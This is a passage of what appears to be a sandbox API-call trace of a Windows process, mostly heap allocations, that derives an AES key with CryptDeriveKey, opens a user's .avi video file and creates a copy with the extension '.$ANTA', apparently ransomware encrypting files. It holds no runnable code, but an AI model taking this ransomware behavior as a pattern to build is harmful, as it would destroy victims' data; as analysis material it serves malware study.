(HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0102.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0102.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0102.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0102.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0102.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0102.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0102.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0102.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0102.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0102.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0102.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0102.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0102.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0102.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0102.134] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0102.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caaa8 [0102.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0102.134] PeekMessageW (in: lpMsg=0x144e03c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e03c) returned 0 [0102.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0102.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0102.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0102.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0102.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0102.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0102.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0102.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0102.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0102.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0102.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0102.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0102.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0102.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0102.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0102.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0102.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0102.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0102.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0102.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0102.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0102.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0102.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0102.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0102.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0102.200] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0102.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0102.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0102.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0102.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0102.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0102.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0102.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0102.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0102.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0102.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0102.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0102.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0102.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0102.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0102.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0102.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0102.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0102.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0102.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0102.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0102.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0102.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0102.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0102.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0102.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0102.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0102.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0102.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0102.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0102.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0102.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0102.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0102.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf) returned 0x43cab08 [0102.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cab08, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0102.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0102.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0102.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0102.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0102.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0102.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0102.202] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac040, dwFlags=0x1, phKey=0x144e070 | out: phKey=0x144e070*=0x41ac200) returned 1 [0102.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0102.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9818 [0102.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0102.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0102.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0102.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0102.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0102.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0102.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0102.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0102.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0102.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0102.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0102.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0102.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0102.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0102.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0102.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0102.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0102.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0102.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0102.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0102.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0102.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0102.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0102.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0102.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0102.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0102.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0102.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea730 [0102.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0102.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0102.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0102.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0102.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0102.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0102.204] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0102.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0102.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0102.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0102.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0102.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0102.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0102.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0102.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caaf0 [0102.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab80 [0102.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac58 [0102.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0102.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad00 [0102.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caac0 [0102.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabf8 [0102.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa90 [0102.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0102.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caad8 [0102.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0102.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac40 [0102.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0102.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cace8 [0102.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab68 [0102.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0102.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabc8 [0102.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabe0 [0102.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0102.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab98 [0102.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabb0 [0102.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0102.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0102.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0102.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0102.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0102.205] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0102.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac70 [0102.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0102.205] PeekMessageW (in: lpMsg=0x144e1ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e1ac) returned 0 [0102.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0102.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0102.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0102.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0102.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0102.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0102.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0102.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0102.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0102.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0102.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0102.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0102.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0102.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0102.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0102.206] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0102.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0102.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0102.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0102.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0102.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0102.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0102.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0102.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0102.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0102.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0102.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0102.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0102.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1797128 [0102.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0102.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0102.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0102.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0102.206] CryptDestroyHash (hHash=0x41ac040) returned 1 [0102.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0102.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0102.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0102.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0102.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0102.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0102.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0102.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0102.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0102.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0102.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0102.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0102.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0102.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0102.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0102.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0102.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0102.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0102.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0102.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0102.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eab80 [0102.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0102.207] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\IQ0I29Q qVTPWYuVmY.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd\\iq0i29q qvtpwyuvmy.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0102.208] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.208] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7a8 | out: lpNewFilePointer=0x0) returned 1 [0102.208] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd")) returned 0x10 [0102.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4051040 | out: hHeap=0x1780000) returned 1 [0102.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0102.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0102.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0102.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0102.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0102.208] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\IQ0I29Q qVTPWYuVmY.avi.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd\\iq0i29q qvtpwyuvmy.avi.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0102.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0102.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0102.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0102.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0102.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0102.209] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0102.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0102.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0102.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0102.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0102.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0102.209] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0102.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0102.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 